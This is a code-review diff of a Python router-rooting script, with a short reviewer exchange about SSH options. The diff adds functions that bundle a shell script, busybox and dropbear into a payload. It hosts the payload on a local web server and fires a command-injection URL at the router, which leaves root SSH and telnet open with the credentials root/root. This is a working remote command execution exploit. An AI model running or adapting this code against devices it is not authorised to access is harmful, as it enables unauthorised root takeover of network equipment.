remote_command_execution_vulnerability.py

```diff
@@ -150,21 +122,56 @@ def isOpen(ip, port):
         return False
     finally:
         s.close()
+#------------------------------------------------------------------------------------------------------------------
+# BuildPayload creates the tar.gz we let the router download from out client
+def BuildPayload():
+    if os.path.exists("build"):
+        shutil.rmtree("build")
+    
+    os.makedirs("build")
+ 
+    # Make tar
+    with tarfile.open("build/payload.tar.gz", "w:gz") as tar:
+        tar.add("script_v2.sh", "script.sh")
+        tar.add("extras/busybox/busybox", "busybox")
+        tar.add("script_tools/dropbearStaticMipsel.tar.bz2", "dropbear.tar.bz2")
+#------------------------------------------------------------------------------------------------------------------
+def ExecuteInjection():
+    from http_file_server import HttpFileServer
+    web_server = HttpFileServer("build")
+    
+    with web_server:
+        # upload and execute payload
+        print("start uploading payload file...")
+        payload_download = requests.get(create_exploit_url(web_server.port))
+        print(payload_download.text)
+
+#------------------------------------------------------------------------------------------------------------------
+# Scriptstart
+#------------------------------------------------------------------------------------------------------------------
+hosting_ip = get_hosting_ip()
+http_port_number = 0
+router_ip_address="192.168.31.1"
+router_ip_address = input("Router IP address [press enter for using the default '{}']: ".format(router_ip_address)) or router_ip_address
+hosting_ip = input("Local Host IP address [press enter for using the default '{}']: ".format(hosting_ip)) or hosting_ip
+stok = get_stok(router_ip_address) or input("You need to get the stok manually, then input the stok here: ")
 
-def checkHost(ip, port):
-    ipup = False
-    for i in range(retry):
-        if isOpen(ip, port):
-            ipup = True
-            break
-        else:
-            time.sleep(delay)
-    return ipup
+print("****************")
+print("router_ip_address: " + router_ip_address)
+print("stok: " + stok)
+print("****************")
+
+BuildPayload()
+ExecuteInjection()
+
+retry = 5
+delay = 5
+timeout = 20
 
 if checkHost(router_ip_address, 22):
     print("done! Now you can connect to the router using several options: (user: root, password: root)")
     print("* telnet {}".format(router_ip_address))
-    print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address))

```

Comment:
Why is `oHostKeyAlgorithms=+ssh-rsa` gone?

Reply:
Why is it needed in the first place? The ssh client does the handshake and got the right cipher and algorithms. 

`
debug1: Remote protocol version 2.0, remote software version dropbear

debug1: compat_banner: no match: dropbear

debug1: Authenticating to hella:22 as root

debug1: SSH2_MSG_KEXINIT sent

debug1: SSH2_MSG_KEXINIT received

debug1: kex: algorithm: curve25519-sha256

debug1: kex: host key algorithm: ssh-ed25519

debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none

debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none

debug1: expecting SSH2_MSG_KEX_ECDH_REPLY

debug1: SSH2_MSG_KEX_ECDH_REPLY received

debug1: Server host key: ssh-ed25519 SHA256:vFou7A4lAJIvzCPMb1ds1Eve7pMZ2z4YNDGTpz48S+4

debug1: Host hella is known and matches the ED25519 host key.
`